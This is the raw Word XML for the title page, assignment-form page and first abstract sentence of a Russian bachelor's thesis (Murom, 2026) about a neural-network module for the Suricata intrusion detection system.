    <w:p w14:paraId="7F7DEC79" w14:textId="7C0A4072" w:rsidR="003F270B" w:rsidRPr="00ED4CBB" w:rsidRDefault="00DD5A13" w:rsidP="00DD5A13">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="4962"/>
          <w:tab w:val="right" w:pos="9356"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00512D96">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>МИВУ.10.03.01-07.000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003F270B" w:rsidRPr="003F270B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>БР</w:t>
      </w:r>
      <w:r w:rsidR="00ED4CBB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A3674ED" w14:textId="5ABB82C4" w:rsidR="004120EE" w:rsidRDefault="004120EE" w:rsidP="00772F95">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2974F3C0" w14:textId="1B3DC602" w:rsidR="00C43C9B" w:rsidRDefault="00DB7E81" w:rsidP="00CC1967">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3969"/>
          <w:tab w:val="left" w:pos="5529"/>
          <w:tab w:val="left" w:pos="9356"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="567"/>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Руководитель</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE20C7A" w14:textId="283911CD" w:rsidR="00DB7E81" w:rsidRPr="006F74AE" w:rsidRDefault="00DB7E81" w:rsidP="00CC1967">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="2268"/>
          <w:tab w:val="left" w:pos="3969"/>
          <w:tab w:val="left" w:pos="5529"/>
          <w:tab w:val="center" w:pos="7230"/>
          <w:tab w:val="left" w:pos="9356"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F74AE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="006F74AE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="006F74AE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="006F74AE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="008E0171" w:rsidRPr="008E0171">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Шапошников О. С.</w:t>
      </w:r>
      <w:r w:rsidRPr="006F74AE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1670838E" w14:textId="004B35BF" w:rsidR="00DB7E81" w:rsidRPr="00CC1967" w:rsidRDefault="00DB7E81" w:rsidP="00CC1967">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="2268"/>
          <w:tab w:val="left" w:pos="3969"/>
          <w:tab w:val="left" w:pos="5529"/>
          <w:tab w:val="center" w:pos="7230"/>
          <w:tab w:val="right" w:pos="9356"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC1967">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CC1967">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CC1967">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CC1967">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>(фамилия, инициалы)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC1967">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD50505" w14:textId="6470FAA7" w:rsidR="00DB7E81" w:rsidRPr="00DB7E81" w:rsidRDefault="006F74AE" w:rsidP="00CC1967">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="2268"/>
          <w:tab w:val="left" w:pos="3969"/>
          <w:tab w:val="left" w:pos="5529"/>
          <w:tab w:val="center" w:pos="7230"/>
          <w:tab w:val="right" w:pos="9356"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00DB7E81">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00DB7E81">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00DB7E81" w:rsidRPr="00DB7E81">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00DB7E81" w:rsidRPr="00DB7E81">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C2B768D" w14:textId="5D7F3AF0" w:rsidR="00DB7E81" w:rsidRPr="00CC1967" w:rsidRDefault="00DB7E81" w:rsidP="00CC1967">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="2268"/>
          <w:tab w:val="left" w:pos="3969"/>
          <w:tab w:val="left" w:pos="5529"/>
          <w:tab w:val="center" w:pos="7230"/>
          <w:tab w:val="right" w:pos="9356"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC1967">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CC1967">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CC1967">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>(подпись)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC1967">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CC1967">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>(дата)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7504EA4B" w14:textId="5A841F8B" w:rsidR="00DB7E81" w:rsidRDefault="00DB7E81" w:rsidP="00CC1967">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="2268"/>
          <w:tab w:val="left" w:pos="3969"/>
          <w:tab w:val="left" w:pos="5529"/>
          <w:tab w:val="right" w:pos="9356"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F74AE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="006F74AE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Студент  </w:t>
      </w:r>
      <w:r w:rsidRPr="00DB7E81">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E59C308" w14:textId="627A361F" w:rsidR="00DB7E81" w:rsidRPr="00CC1967" w:rsidRDefault="00DB7E81" w:rsidP="00CC1967">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="2268"/>
          <w:tab w:val="right" w:pos="3969"/>
          <w:tab w:val="left" w:pos="5529"/>
          <w:tab w:val="center" w:pos="7797"/>
          <w:tab w:val="right" w:pos="9356"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC1967">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CC1967">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CC1967">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CC1967">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>(группа)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC1967">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F0C1ABC" w14:textId="45F6F91B" w:rsidR="00DB7E81" w:rsidRPr="006F74AE" w:rsidRDefault="00DB7E81" w:rsidP="00CC1967">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="2268"/>
          <w:tab w:val="left" w:pos="3969"/>
          <w:tab w:val="left" w:pos="5529"/>
          <w:tab w:val="center" w:pos="7230"/>
          <w:tab w:val="left" w:pos="9356"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F74AE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="006F74AE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="006F74AE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="006F74AE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="008E0171">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Мошков Т. Д.</w:t>
      </w:r>
      <w:r w:rsidRPr="006F74AE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6A846C" w14:textId="6112295B" w:rsidR="00DB7E81" w:rsidRPr="00CC1967" w:rsidRDefault="00DB7E81" w:rsidP="00CC1967">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="2268"/>
          <w:tab w:val="right" w:pos="3969"/>
          <w:tab w:val="left" w:pos="5529"/>
          <w:tab w:val="center" w:pos="7230"/>
          <w:tab w:val="right" w:pos="9356"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC1967">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CC1967">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CC1967">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CC1967">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>(фамилия, инициалы)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC1967">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6767132D" w14:textId="77777777" w:rsidR="00DB7E81" w:rsidRPr="00DB7E81" w:rsidRDefault="00DB7E81" w:rsidP="00CC1967">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="2268"/>
          <w:tab w:val="left" w:pos="3969"/>
          <w:tab w:val="left" w:pos="5529"/>
          <w:tab w:val="center" w:pos="7230"/>
          <w:tab w:val="right" w:pos="9356"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>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B7E81">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00DB7E81">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A8FF76" w14:textId="0A679521" w:rsidR="004654AE" w:rsidRPr="00ED4CBB" w:rsidRDefault="00DB7E81" w:rsidP="00ED4CBB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="2268"/>
          <w:tab w:val="left" w:pos="3969"/>
          <w:tab w:val="left" w:pos="5529"/>
          <w:tab w:val="center" w:pos="7230"/>
          <w:tab w:val="right" w:pos="9356"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC1967">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CC1967">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CC1967">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>(подпись)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC1967">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CC1967">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>(дата)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B8D4D79" w14:textId="77777777" w:rsidR="00ED4CBB" w:rsidRDefault="00ED4CBB" w:rsidP="000B2212">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46208BA0" w14:textId="03108364" w:rsidR="000B2212" w:rsidRPr="00ED4CBB" w:rsidRDefault="000B2212" w:rsidP="000B2212">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:sectPr w:rsidR="000B2212" w:rsidRPr="00ED4CBB" w:rsidSect="005C3F3C">
          <w:headerReference w:type="default" r:id="rId8"/>
          <w:pgSz w:w="11906" w:h="16838" w:code="9"/>
          <w:pgMar w:top="851" w:right="680" w:bottom="851" w:left="1531" w:header="284" w:footer="284" w:gutter="0"/>
          <w:cols w:space="708"/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4CBB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Муром 2026</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25345F62" w14:textId="77777777" w:rsidR="00E96A89" w:rsidRPr="00301C2C" w:rsidRDefault="00E96A89" w:rsidP="00E96A89">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="96"/>
          <w:szCs w:val="96"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00301C2C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="96"/>
          <w:szCs w:val="96"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>БЛАНК ЗАДАНИЯ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B59D6E0" w14:textId="5FADAF8B" w:rsidR="00E96A89" w:rsidRPr="00997313" w:rsidRDefault="00E96A89" w:rsidP="00E96A89">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00997313">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="08926007" w14:textId="373363E9" w:rsidR="005F6CB3" w:rsidRDefault="006E26C2" w:rsidP="005F6CB3">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E26C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">В бакалаврской работе разработан и исследован нейросетевой </w:t>
      </w:r>
      <w:r w:rsidR="005C39E4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>модуль</w:t>
      </w:r>
      <w:r w:rsidRPr="006E26C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> для системы обнаружения вторжений </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006E26C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Suricata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006E26C2">
        <w:rPr>
